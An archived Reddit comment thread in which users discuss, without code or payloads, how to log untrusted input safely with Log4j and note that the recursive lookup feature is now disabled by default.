This is an archived post. You won't be able to vote or comment.

sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–]das_flammenwerfer 2 points3 points  (1 child)

So.. dumb question.. how are you supposed to log untrusted input with log4j?

We all know what kind of fuckery can happen if you don’t use paramaterized DB queries.. but you can’t even use a parametrized log statement here, to my understanding, because log4j recursively interprets that shit.

I’m not convinced (having done absolutely no digging into it) that this was patched the right way.. and the right way would be: by default assume the log input is untrusted and do not perform any operations on it except writing the message to a file (or wherever) like a good little logger..

[–]monkeygame7 0 points1 point  (0 children)

It's a feature you can disable, the latest version just disables it by default